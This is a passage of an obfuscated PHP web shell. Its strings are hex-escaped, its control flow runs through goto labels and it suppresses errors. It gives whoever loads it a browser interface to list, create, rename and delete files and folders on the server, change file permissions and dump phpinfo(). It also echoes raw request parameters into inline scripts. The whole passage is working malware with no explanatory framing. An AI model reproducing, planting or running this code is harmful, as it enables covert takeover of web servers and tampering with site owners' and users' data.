$_GET["\x70\141\164\x68"] . "\x27\x3b\12\40\40\40\x20\x20\40\40\40\40\40\x20\40\40\40\x20\40\40\x20\x20\40\40\x20\x20\40\74\57\163\x63\162\151\160\x74\x3e\12\40\x20\x20\40\40\40\x20\x20\40\x20\40\x20\40\40\40\40\x20\x20\40\40\x20\x20\40\40"; } } else { echo "\xa\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\40\40\40\x3c\x73\x63\x72\151\x70\x74\x3e\xa\40\40\40\x20\x20\40\40\x20\40\x20\40\40\40\40\40\40\40\x20\x20\40\141\154\145\x72\164\50\x27\x66\x69\154\145\40\x6e\x61\x6d\x65\40\141\154\x72\x65\141\144\171\40\145\170\151\x73\x74\163\x27\x29\73\12\40\40\40\x20\x20\x20\x20\40\40\40\40\40\x20\40\40\40\40\40\x20\40\144\157\143\x75\155\145\x6e\164\56\x6c\x6f\x63\x61\x74\x69\157\156\56\150\162\145\x66\x20\75\x20\x27\x3f\160\x61\x74\x68\75" . $_GET["\160\x61\x74\150"] . "\47\x3b\xa\40\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\x3c\x2f\163\143\162\151\160\x74\76\12\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\40"; } } else { echo "\12\x20\40\40\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\x3c\x73\x63\162\x69\160\164\76\12\40\x20\40\40\40\x20\40\40\40\x20\x20\40\40\40\x20\40\x61\154\145\x72\x74\x28\x27\165\x73\145\40\141\x20\144\151\146\x66\145\x72\x65\156\164\x20\x6e\x61\155\145\x27\x29\73\xa\x20\x20\40\x20\40\40\40\40\40\40\x20\x20\40\40\40\x20\144\x6f\143\165\155\x65\x6e\x74\x2e\x6c\x6f\x63\x61\164\x69\x6f\x6e\56\x68\x72\145\x66\40\75\40\x27\x3f\160\141\x74\x68\x3d" . $_GET["\160\141\x74\150"] . "\47\x3b\12\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\40\x20\40\40\x20\x3c\57\163\x63\162\151\x70\x74\x3e\xa\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40"; } } else { echo "\xa\x20\40\40\x20\x20\40\40\40\40\x20\x20\x20\x3c\163\x63\x72\151\x70\164\76\12\x20\x20\x20\40\40\40\40\x20\x20\40\40\x20\141\x6c\x65\162\x74\x28\47\144\x69\162\x65\143\164\x6f\162\x79\x20\x6e\x6f\x74\40\146\157\x75\156\144\47\51\x3b\xa\40\x20\x20\40\40\x20\x20\40\40\x20\x20\40\x64\157\x63\x75\155\145\x6e\x74\56\154\157\143\x61\164\x69\157\156\56\150\x72\145\x66\x20\x3d\x20\x27\x3f\160\141\164\x68\75" . $_GET["\160\x61\x74\x68"] . "\x27\73\12\40\40\40\x20\40\40\x20\40\x20\40\x20\40\x3c\57\x73\143\162\x69\x70\x74\76\xa\40\40\x20\x20\40\x20\40\40\x20\x20\40\x20"; } } else { echo "\xa\x20\40\x20\40\40\40\x20\x20\74\163\x63\162\151\x70\164\x3e\12\40\40\x20\x20\x20\x20\40\40\141\x6c\x65\x72\x74\x28\x27\x66\x61\x69\154\x65\x64\47\51\73\12\x20\x20\x20\x20\x20\x20\x20\40\144\157\x63\x75\x6d\x65\156\164\x2e\154\x6f\143\141\164\x69\157\x6e\56\150\162\145\x66\x20\x3d\x20\47\77\160\x61\x74\150\75" . $_GET["\x70\x61\164\x68"] . "\x27\x3b\xa\x20\x20\40\x20\40\x20\x20\x20\74\x2f\163\143\162\151\160\164\76\xa\x20\x20\40\40\40\40\40\40"; } } goto VoETZ; aRlp5: if (substr($path, 0, 2) == "\x23\103") { $home = dirname(substr($path, 2)); $home = base64_encode($home); $perms = substr(sprintf("\45\x6f", fileperms(substr($path, 2))), -3); $chv = fileperms(substr($path, 2)); $a = $chv & 256 ? "\x20\143\x68\145\143\153\145\x64" : ''; $b = $chv & 32 ? "\x20\143\150\145\x63\x6b\x65\144" : ''; $c = $chv & 4 ? "\40\143\150\145\143\x6b\x65\144" : ''; $d = $chv & 128 ? "\40\x63\x68\x65\x63\x6b\145\x64" : ''; $e = $chv & 16 ? "\x20\143\150\x65\143\x6b\145\144" : ''; $f = $chv & 2 ? "\40\x63\150\x65\x63\x6b\145\x64" : ''; $g = $chv & 64 ? "\x20\143\x68\x65\143\153\145\x64" : ''; $h = $chv & 8 ? "\x20\x63\150\x65\x63\x6b\x65\144" : ''; $i = $chv & 1 ? "\40\143\x68\x65\x63\x6b\145\x64" : ''; if (isset($_POST["\x73\x75\x62\x6d\151\x74\x5f\143\x68\155\x6f\x64"])) { $chmode = 0; if (!empty($_POST["\162\141"])) { $chmode |= 256; } if (!empty($_POST["\167\x61"])) { $chmode |= 128; } if (!empty($_POST["\145\141"])) { $chmode |= 64; } if (!empty($_POST["\162\142"])) { $chmode |= 32; } if (!empty($_POST["\167\142"])) { $chmode |= 16; } if (!empty($_POST["\x65\142"])) { $chmode |= 8; } if (!empty($_POST["\162\143"])) { $chmode |= 4; } if (!empty($_POST["\x77\143"])) { $chmode |= 2; } if (!empty($_POST["\145\143"])) { $chmode |= 1; } if (chmod(substr($path, 2), $chmode)) { echo "\12\40\40\x20\40\40\40\x20\40\40\x20\40\40\x3c\x73\x63\162\151\160\164\76\xa\40\40\x20\x20\40\x20\40\40\40\40\x20\40\x61\x6c\145\162\164\x28\x27\163\165\143\x63\x65\163\163\x66\165\x6c\x6c\171\x27\51\73\xa\40\x20\x20\40\40\x20\x20\40\40\40\40\40\x64\157\x63\x75\x6d\145\156\164\56\154\x6f\143\141\164\x69\x6f\x6e\56\150\162\x65\146\40\75\x20\x27\x3f\160\x61\x74\x68\75" . $home . "\x27\73\xa\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\74\57\163\x63\162\x69\x70\164\76\12\40\x20\x20\40\40\x20\x20\x20\40\40\40\40"; } else { echo "\xa\x20\40\40\x20\40\40\x20\x20\x20\x20\40\x20\x3c\x73\x63\x72\151\x70\164\76\xa\40\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\141\154\145\162\x74\x28\47\x66\141\151\154\145\144\x27\x29\x3b\xa\x20\x20\40\40\x20\40\x20\x20\40\40\40\40\x64\x6f\143\165\x6d\x65\x6e\164\56\x6c\157\143\141\x74\x69\x6f\156\56\x68\162\x65\146\40\x3d\x20\x27\x3f\160\141\164\x68\75" . $home . "\x27\x3b\xa\x20\40\40\40\40\x20\40\x20\40\40\x20\40\74\57\x73\x63\x72\x69\x70\164\x3e\xa\40\40\x20\40\x20\40\40\x20\40\40\40\x20"; } } echo "\12\40\40\x20\40\x20\x20\x20\x20\74\150\x72\x20\x63\157\154\x6f\x72\x3d\x27\x47\162\x61\171\47\76\74\146\157\162\x6d\40\x61\x63\164\x69\157\156\x3d\47\47\x20\x6d\x65\x74\150\157\x64\75\47\160\x6f\163\164\x27\76\xa\40\40\x20\x20\40\40\40\40\74\x69\x6e\160\x75\164\x20\x74\171\x70\x65\x3d\47\x74\145\170\x74\47\40\x72\145\141\x64\157\x6e\x6c\x79\x3d\x27\162\x65\x61\144\157\156\154\171\x27\40\x76\x61\x6c\165\145\75\x27" . substr($path, 2) . "\x27\40\151\144\x3d\47\x6f\156\145\x27\x20\x73\x74\171\154\x65\x3d\47\x77\151\144\x74\x68\72\x20\x31\60\60\45\x27\x3e\12\x20\x20\40\40\x20\x20\x20\40\x3c\x68\162\40\x63\x6f\x6c\x6f\x72\x3d\47\x47\x72\141\171\47\x3e\12\x20\40\x20\x20\x20\x20\40\40\74\x74\141\x62\x6c\x65\40\x77\151\x64\164\x68\75\47\x31\x30\x30\x25\x27\x3e\12\x20\40\40\40\x20\x20\x20\40\40\40\40\40\x3c\164\x72\76\12\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\74\164\150\x20\143\154\x61\163\x73\x3d\x27\143\150\x6d\x6f\144\144\47\76\x50\x65\162\155\x69\x73\x73\x69\157\x6e\x73\74\57\x74\150\76\12\40\x20\x20\40\40\40\40\40\x20\40\40\40\40\40\x20\x20\x3c\x74\x68\40\143\154\141\x73\163\75\x27\x63\x68\155\x6f\144\144\x27\x3e\117\167\156\x65\x72\x3c\x2f\x74\150\x3e\12\40\x20\40\40\x20\x20\x20\40\x20\40\40\x20\40\40\40\40\x3c\x74\x68\x20\x63\154\x61\163\163\x3d\x27\x63\x68\x6d\x6f\144\x64\x27\76\107\x72\157\165\160\74\x2f\x74\x68\x3e\xa\40\40\40\x20\40\40\40\40\40\40\x20\x20\40\x20\40\x20\74\x74\150\40\x63\x6c\141\163\163\x3d\47\143\x68\x6d\157\144\x64\47\x3e\x4f\x74\x68\x65\162\74\x2f\164\150\76\xa\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\x3c\57\164\162\76\xa\40\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\x3c\164\162\x3e\xa\40\x20\x20\x20\x20\40\x20\40\40\40\40\x20\40\40\x20\x20\74\164\144\x3e\x52\145\x61\144\x3c\57\164\x64\x3e\12\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x3c\164\144\x3e\74\x63\145\156\x74\x65\162\76\x3c\x69\x6e\160\165\164\x20\164\x79\160\145\x3d\47\x63\x68\x65\143\x6b\142\x6f\x78\x27\x20\x6e\x61\x6d\145\x3d\x27\x72\141\x27\x20\166\x61\154\165\145\x3d\x27\x31\47\x20" . $a . "\x3e\x3c\x2f\x63\x65\156\164\145\x72\76\x3c\x2f\164\144\x3e\12\x20\40\x20\40\x20\x20\40\40\40\x20\x20\x20\x20\40\x20\40\x3c\x74\144\76\74\x63\x65\156\164\145\x72\76\x3c\151\x6e\160\x75\x74\40\164\171\x70\x65\75\x27\143\150\x65\143\153\x62\157\x78\47\40\x6e\141\155\145\75\x27\x72\x62\x27\x20\x76\x61\154\x75\145\x3d\47\x31\x27\40" . $b . "\76\x3c\x2f\143\145\x6e\x74\x65\x72\76\74\57\164\x64\76\xa\40\x20\40\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\74\x74\144\x3e\74\x63\x65\156\x74\x65\x72\76\74\x69\156\x70\x75\164\x20\164\171\160\x65\75\47\143\150\145\143\153\x62\157\x78\47\x20\x6e\x61\155\145\x3d\47\162\143\47\40\x76\141\x6c\x75\x65\75\x27\61\47\40" . $c . "\76\x3c\57\x63\145\x6e\x74\145\x72\76\74\57\x74\144\x3e\xa\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\x3c\57\164\x72\76\xa\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\x3c\x74\162\76\12\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x3c\164\x64\76\x57\x72\x69\164\145\74\57\164\x64\x3e\xa\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\74\164\144\x3e\74\143\x65\x6e\x74\145\x72\76\74\151\x6e\160\x75\164\x20\x74\x79\x70\x65\x3d\47\x63\x68\x65\x63\153\142\x6f\x78\47\40\156\141\155\145\x3d\x27\167\141\x27\x20\x76\x61\154\x75\145\75\x27\x31\47\40" . $d . "\x3e\74\57\x63\145\x6e\x74\x65\162\x3e\74\57\164\144\x3e\xa\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\40\x20\x20\x20\74\x74\x64\76\x3c\143\145\x6e\x74\145\x72\76\x3c\x69\156\x70\x75\x74\40\x74\171\x70\x65\75\47\143\x68\x65\x63\x6b\142\157\170\x27\40\156\x61\155\145\x3d\47\x77\x62\x27\x20\x76\x61\154\x75\x65\75\47\x31\47\x20" . $e . "\76\74\x2f\x63\145\156\164\145\x72\x3e\x3c\57\x74\144\76\xa\x20\40\40\x20\x20\x20\40\40\x20\x20\40\40\x20\40\x20\40\x3c\x74\144\x3e\x3c\143\x65\156\164\x65\162\76\x3c\151\x6e\160\165\164\40\x74\171\x70\x65\75\x27\x63\150\145\143\153\x62\157\x78\47\40\x6e\141\155\x65\75\47\x77\x63\x27\40\166\x61\154\x75\145\x3d\47\x31\x27\40" . $f . "\76\74\x2f\143\145\x6e\x74\145\x72\76\74\x2f\164\x64\76\12\40\40\x20\40\40\40\40\40\40\x20\x20\x20\x3c\57\x74\x72\76\12\40\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\74\164\x72\76\xa\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\74\164\144\x3e\105\x78\x65\x63\165\x74\145\74\x2f\x74\144\76\12\x20\40\x20\x20\40\40\40\40\x20\40\x20\40\40\x20\40\x20\x3c\164\x64\76\74\x63\x65\x6e\x74\145\x72\76\x3c\151\156\x70\x75\164\40\164\x79\x70\145\75\47\143\x68\x65\143\x6b\x62\x6f\x78\x27\40\156\x61\x6d\145\75\x27\145\141\47\x20\x76\x61\154\165\145\75\47\61\47\40" . $g . "\76\x3c\57\143\145\x6e\164\145\162\x3e\x3c\57\x74\x64\76\12\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\40\x3c\x74\144\x3e\74\143\x65\156\164\145\x72\x3e\x3c\x69\x6e\x70\165\x74\x20\164\171\160\x65\x3d\x27\143\150\x65\143\153\142\x6f\x78\47\x20\156\x61\x6d\x65\x3d\x27\x65\x62\47\40\166\141\154\165\145\75\x27\x31\x27\40" . $h . "\76\74\x2f\x63\145\156\164\x65\162\76\74\57\x74\x64\x3e\12\40\x20\x20\x20\x20\40\x20\40\40\40\40\x20\40\40\x20\40\x3c\164\144\76\x3c\143\145\156\164\145\x72\x3e\x3c\x69\156\160\x75\164\x20\x74\171\x70\145\x3d\x27\143\x68\x65\x63\x6b\x62\157\x78\47\x20\156\141\155\x65\x3d\x27\x65\x63\x27\x20\166\141\154\x75\145\75\x27\61\x27\x20" . $i . "\x3e\74\x2f\x63\145\x6e\164\x65\162\x3e\x3c\x2f\x74\x64\x3e\12\40\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x3c\x2f\x74\162\x3e\xa\40\40\x20\40\40\40\x20\x20\74\57\x74\x61\142\x6c\145\x3e\74\150\162\x20\x63\157\x6c\x6f\162\75\47\107\162\141\x79\47\76\xa\40\40\x20\x20\40\40\x20\x20\x3c\143\x65\x6e\164\x65\162\x3e\x3c\x61\40\150\x72\x65\x66\x3d\x27\x3f\x70\141\164\150\75" . $home . "\47\76\143\x61\156\x63\145\x6c\74\57\141\x3e\12\40\40\x20\40\x20\40\40\x20\74\151\156\160\x75\164\40\164\x79\160\x65\75\47\163\x75\142\155\151\x74\x27\x20\156\x61\x6d\145\75\47\163\165\x62\x6d\151\x74\x5f\143\150\x6d\x6f\x64\x27\x20\x76\141\154\165\145\75\47\143\150\x61\x6e\147\x65\47\40\x69\x64\x3d\x27\164\x77\157\x27\76\74\x2f\x63\145\x6e\164\x65\162\76\xa\40\40\x20\x20"; die; } goto ooGOr; fYM4d: $scanPath = array_values($scanPath); goto orkb_; SWgHB: if (isset($_POST["\143\162\x66"])) { if (is_dir($_POST["\x70\x61\164\x68\x66\x6f\x6c\x64\x65\x72"])) { if (strpos($_POST["\x70\141\x74\150\x66\x6f\x6c\144\145\x72"], "\x2e\x2e") !== FALSE) { echo "\xa\40\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\x3c\x73\143\162\x69\160\164\x3e\12\x20\40\x20\40\40\x20\x20\40\x20\40\x20\40\141\x6c\145\162\164\50\x27\146\x61\151\x6c\x65\144\x27\x29\73\12\40\40\40\x20\x20\40\40\40\x20\40\x20\40\x64\x6f\143\x75\x6d\145\x6e\164\56\x6c\157\143\141\164\151\x6f\x6e\56\150\x72\x65\146\x20\x3d\x20\47\77\x70\141\x74\x68\75" . $_GET["\160\x61\x74\x68"] . "\47\x3b\12\40\x20\x20\40\x20\40\40\40\40\x20\40\x20\74\x2f\163\143\162\151\160\164\76\xa\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\40"; } if (strpos($_POST["\146\157\x6c\x64\x65\162\x6e\141\155\x65"], "\57") !== FALSE) { echo "\xa\40\40\40\40\40\x20\x20\40\x20\x20\40\x20\x3c\163\143\162\151\x70\x74\x3e\xa\40\40\x20\40\40\40\40\40\40\x20\40\40\x61\154\145\x72\x74\50\47\x75\163\145\40\x61\40\x64\151\x66\146\145\162\145\x6e\164\40\x6e\141\155\x65\47\51\x3b\xa\40\x20\40\x20\x20\40\40\x20\x20\x20\40\40\144\x6f\x63\x75\155\145\x6e\164\x2e\x6c\157\143\141\x74\151\157\x6e\56\x68\x72\145\146\x20\x3d\x20\47\77\160\x61\x74\150\x3d" . $_GET["\160\141\x74\150"] . "\x27\x3b\xa\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\x20\x3c\x2f\163\143\162\x69\x70\x74\x3e\xa\40\40\x20\x20\40\x20\40\40\x20\x20\x20\x20"; } else { $o2 = explode("\x2f", $_POST["\x70\141\x74\x68\x66\x6f\154\x64\145\x72"]); $o2 = implode("\57", $o2); $o2 = $o2 . $slash . $_POST["\x66\x6f\154\x64\x65\x72\x6e\141\x6d\145"]; if (!is_dir($o2)) { if (mkdir($o2)) { echo "\xa\40\40\x20\x20\x20\40\x20\x20\40\40\40\x20\40\40\x20\40\40\40\x20\x20\x3c\163\x63\x72\151\x70\164\x3e\xa\x20\x20\x20\x20\x20\x20\40\40\40\x20\40\40\40\x20\x20\40\40\40\40\40\x61\154\x65\x72\164\x28\x27\163\x75\x63\x63\145\x73\163\x66\x75\154\154\171\x27\x29\73\12\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\40\40\40\40\x20\x20\40\144\157\143\x75\155\x65\x6e\x74\56\x6c\x6f\x63\x61\x74\x69\157\x6e\x2e\150\162\145\x66\40\75\40\47\77\160\x61\164\x68\x3d" . $_GET["\x70\x61\x74\150"] . "\47\73\xa\40\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\40\40\x20\40\x3c\x2f\163\x63\162\151\160\164\76\12\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\40"; } else { echo "\12\40\40\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\40\40\x20\x3c\163\143\x72\151\160\164\76\xa\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\40\40\x20\x20\x20\40\141\154\x65\162\164\50\47\146\x61\x69\x6c\145\x64\x27\x29\x3b\12\40\40\40\x20\40\40\x20\x20\40\40\40\40\x20\40\x20\x20\40\40\40\40\x64\x6f\x63\165\x6d\145\x6e\x74\x2e\x6c\157\143\x61\x74\151\x6f\156\x2e\x68\x72\x65\x66\x20\x3d\40\x27\77\160\141\x74\150\x3d" . $_GET["\x70\x61\164\x68"] . "\47\73\12\40\40\x20\x20\40\40\x20\x20\40\40\40\40\x20\40\40\x20\x20\40\x20\x20\x3c\x2f\x73\143\162\x69\x70\x74\76\12\40\x20\x20\40\40\40\40\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40"; } } else { echo "\xa\40\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\40\x20\40\74\163\143\x72\x69\x70\x74\x3e\12\40\40\x20\x20\40\40\40\x20\40\x20\40\x20\40\x20\40\40\141\x6c\x65\x72\164\50\x27\146\x6f\154\x64\145\x72\40\156\x61\155\x65\x20\x61\x6c\162\x65\144\x79\40\145\x78\x69\163\164\163\47\x29\73\12\40\40\40\40\40\40\x20\x20\x20\40\40\40\40\40\x20\x20\144\x6f\x63\x75\155\x65\156\164\56\154\157\143\141\x74\x69\x6f\156\56\150\162\145\146\40\x3d\x20\47\77\x70\x61\x74\x68\75" . $_GET["\x70\x61\x74\150"] . "\x27\x3b\12\40\x20\x20\x20\40\40\x20\40\40\40\40\40\40\40\40\40\74\57\163\143\162\x69\160\164\76\12\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\40\40\40"; } } } else { echo "\12\40\40\40\40\x20\x20\40\40\x3c\x73\143\162\151\x70\164\x3e\12\40\x20\40\40\40\40\x20\40\141\154\145\x72\164\x28\x27\144\x69\162\x65\143\x74\x6f\162\171\x20\x6e\x6f\164\40\146\157\165\x6e\144\x27\x29\73\12\x20\x20\x20\x20\40\x20\40\x20\x64\157\x63\165\155\145\156\x74\56\154\157\143\141\164\x69\157\x6e\x2e\150\x72\145\x66\40\x3d\40\47\77\x70\x61\x74\x68\x3d" . $_GET["\x70\141\164\x68"] . "\x27\73\xa\x20\40\40\40\40\40\40\40\x3c\x2f\163\x63\162\x69\x70\x74\x3e\xa\x20\x20\40\40\x20\x20\40\40"; } } goto Tvnac; Rgq3v: error_reporting(0); goto Pzuo1; cfpHX: $path = base64_decode($_GET["\160\141\164\150"]); goto nSCuk; w9eHE: if ($path !== "\x2f") { $alpha = dirname($path); echo "\74\164\x72\x3e\74\164\144\40\167\151\144\x74\x68\75\47\x32\45\x27\x3e\74\144\x69\x76\x20\143\x6c\141\x73\x73\75\x27\x69\x63\x6c\141\163\163\x27\76\74\141\x20\150\x72\x65\146\75\x27\77\160\x61\x74\150\75" . base64_encode($alpha) . "\x27\x3e\x2e\x2e\x3c\x2f\x61\76\x3c\57\144\x69\166\76\74\x2f\x74\144\76\74\x2f\x74\x72\x3e"; } goto WZ2wP; RuHaG: for ($i = 0; $i < count($scanPath); $i++) { $iota = $scanPath[$i]; $pathType = mime_content_type($path . $slash . $iota); $pathType = explode("\57", $pathType); if ($pathType[0] !== "\141\x70\x70\x6c\x69\143\x61\x74\151\x6f\x6e") { if ($pathType[0] !== "\x74\x65\170\x74") { if (is_file($path . $slash . $iota)) { $sizeA = filesize($path . $slash . $iota); $filesize = $sizeA; $sizeks = "\x42"; if ($sizeA > 1024) { $filesize = round($sizeA / 1024); $sizeks = "\113\102"; } if ($sizeA > 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024); $sizeks = "\115\x42"; } if ($sizeA > 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024); $sizeks = "\107\102"; } if ($sizeA > 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024); $sizeks = "\124\x42"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "\120\x42"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "\x45\x42"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "\x5a\x42"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "\131\x42"; } $result = filemtime($path . $slash . $iota); $result = getdate($result); $one = strlen($result["\x6d\144\141\x79"]); $two = strlen($result["\155\157\156"]); $three = strlen($result["\x79\145\x61\x72"]); $four = strlen($result["\150\157\x75\162\163"]); $five = strlen($result["\155\x69\x6e\x75\164\145\163"]); if ($one == "\x31") { $result["\155\x64\141\x79"] = "\x30" . $result["\x6d\x64\x61\x79"]; } if ($two == "\x31") { $result["\x6d\x6f\156"] = "\x30" . $result["\155\157\156"]; } if ($three == "\x31") { $result["\171\x65\141\x72"] = "\60" . $result["\171\x65\141\x72"]; } if ($four == "\61") { $result["\x68\x6f\x75\162\x73"] = "\x30" . $result["\150\157\x75\x72\x73"]; } if ($five == "\61") { $result["\x6d\151\156\x75\x74\145\163"] = "\x30" . $result["\x6d\151\156\165\164\x65\163"]; } $result = $result["\155\x64\x61\171"] . "\x2d" . $result["\x6d\157\156"] . "\x2d" . $result["\x79\x65\x61\162"] . "\40" . $result["\150\157\165\162\x73"] . "\72" . $result["\155\x69\156\x75\164\145\x73"]; echo "\x3c\164\x72\76\74\x74\144\40\167\x69\144\x74\150\x3d\47\x32\x25\47\x3e\74\x64\x69\166\40\143\154\x61\x73\x73\75\x27\151\143\154\x61\x73\x73\47\76\106\x3c\x2f\x64\151\166\x3e\74\x2f\164\144\76\x3c\164\x64\40\167\x69\144\x74\150\x3d\47\x35\x30\45\x27\76\174\x20\74\x69\x6e\x70\165\x74\40\164\x79\160\x65\75\47\x74\x65\170\x74\x27\x20\x72\x65\x61\144\x6f\x6e\154\171\x3d\47\162\x65\141\144\x6f\156\154\x79\x27\40\x69\144\x3d\x27\x6f\156\x65\47\40\x76\141\154\x75\x65\75\x27" . $iota . "\47\x20\163\x74\x79\x6c\x65\x3d\47\x77\151\144\x74\x68\x3a\40\65\60\45\x27\76\x3c\x2f\164\144\x3e\xa\x20\x20\x20\40\40\40\40\40\x20\x20\40\40\40\40\x20\40\74\x74\x64\40\167\x69\144\164\150\75\x27\61\60\x25\x27\x3e\74\x63\145\156\164\x65\x72\76" . $filesize . $sizeks . "\74\x2f\143\x65\156\164\x65\x72\76\x3c\57\x74\x64\x3e\x3c\x74\x64\40\167\x69\144\164\150\75\x27\x32\60\45\47\x3e\x3c\143\x65\156\164\145\x72\76" . $result . "\74\57\143\x65\156\x74\x65\x72\x3e\x3c\x2f\164\144\x3e\12\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\74\x74\144\x20\167\151\144\164\150\75\47\x35\x25\47\76\x3c\x63\145\x6e\164\x65\x72\76\74\x61\40\164\x69\164\154\145\75\47\x63\150\x6d\157\144\40" . $iota . "\x27\x20\150\162\145\146\75\47\x3f\160\x61\x74\x68\x3d" . base64_encode("\x23\103" . $path . $slash . $iota) . "\47\76" . substr(sprintf("\45\x6f", fileperms($path . $slash . $iota)), -4) . "\x3c\x2f\141\76\x3c\x2f\143\145\x6e\x74\x65\x72\76\74\x2f\164\144\x3e\xa\x20\x20\40\x20\40\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\x3c\x74\144\40\163\x74\171\x6c\145\x3d\47\x77\151\144\164\x68\x3a\40\x35\x25\x27\76\74\143\145\x6e\164\x65\x72\x3e\x3c\x61\40\164\151\164\154\x65\75\47\162\x65\156\141\155\145\40" . $iota . "\x27\x20\150\x72\145\x66\75\47\x3f\x70\141\164\x68\x3d" . base64_encode("\43\122" . $path . $slash . $iota) . "\47\76\x52\74\x2f\x61\x3e\12\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\40\40\40\74\x61\40\x74\151\x74\x6c\145\x3d\47\144\145\x6c\x65\x74\145\40" . $iota . "\x27\x20\x68\x72\145\146\75\47\77\160\141\x74\x68\x3d" . base64_encode("\43\104" . $path . $slash . $iota) . "\x27\76\x44\74\57\x61\76\x3c\57\x63\145\x6e\164\x65\162\76\x3c\57\x74\x64\76\x3c\57\164\162\x3e"; } } } } goto dSPjL; fq9Qh: if (isset($_POST["\x63\x72\145\141\164\x65\x5f\146\151\x6c\145"])) { echo "\12\40\x20\x20\40\143\x72\145\x61\x74\x65\40\x6f\x6e\x20\72\40\74\151\156\x70\165\x74\40\164\x79\x70\x65\x3d\47\x74\x65\170\x74\x27\x20\141\x75\x74\157\143\x6f\x6d\x70\154\145\x74\x65\x3d\47\x6f\x66\146\47\x20\x69\144\75\47\x74\145\170\x74\151\x6e\x70\165\164\x27\x20\x6e\x61\x6d\145\75\x27\x70\x61\x74\x68\x66\x69\x6c\x65\47\x20\x76\141\x6c\x75\145\x3d\x27" . $path . $slash . "\47\40\x77\151\x64\164\x68\75\47\61\x30\x30\x70\x78\x27\76\x3c\x62\x72\x3e\12\40\x20\x20\40\x3c\x69\x6e\x70\165\x74\40\164\x79\x70\145\75\47\164\145\170\x74\47\x20\141\165\x74\x6f\143\x6f\155\x70\x6c\145\x74\x65\75\47\157\x66\146\47\x20\156\x61\155\x65\75\47\146\151\x6c\x65\x6e\141\x6d\x65\47\x20\x69\x64\75\x27\x74\x68\x72\x65\x65\x27\40\160\154\x61\x63\x65\x68\157\x6c\144\145\x72\75\x27\146\151\154\145\x20\156\x61\155\145\47\x3e\74\150\x72\x20\x63\157\x6c\x6f\162\x3d\47\x47\x72\141\x79\x27\76\x3c\143\x65\156\164\145\162\76\74\141\40\150\162\145\x66\x3d\47\x3f\x70\141\x74\150\x3d" . $_GET["\x70\141\x74\150"] . "\47\76\143\141\156\143\145\x6c\x3c\x2f\141\x3e\12\x20\40\40\40\74\x69\x6e\x70\x75\164\x20\x74\171\160\x65\x3d\47\x73\x75\x62\x6d\151\164\x27\40\156\x61\155\145\75\47\143\162\146\154\x27\x20\x76\141\x6c\165\145\75\47\x63\x72\145\141\x74\145\x27\40\x69\144\x3d\x27\x74\167\x6f\47\76\12\40\40\40\40"; die; } goto rw4O3; dt2VG: if (isset($_POST["\x70\x68\160\x69\x6e\x66\x6f"])) { echo "\74\x61\x20\x68\x72\145\x66\x3d\x27\77\160\141\164\x68\x3d" . $_GET["\x70\141\164\x68"] . "\47\x3e\142\141\x63\153\x3c\x2f\x61\76"; phpinfo(); die; } goto JZ6YT; jQLDO: echo "\74\164\141\142\x6c\145\40\167\151\144\164\150\x3d\47\x31\x30\60\x25\47\76"; goto w9eHE; rw4O3: echo "\12\x3c\x69\156\160\165\164\x20\164\171\160\145\75\x27\164\x65\x78\164\x27\x20\162\145\141\x64\157\156\x6c\171\x3d\x27\x72\145\141\x64\157\156\154\x79\47\40\x69\x64\75\47\157\x6e\145\x27\40\x76\x61\x6c\x75\145\75\47" . $path . $slash . 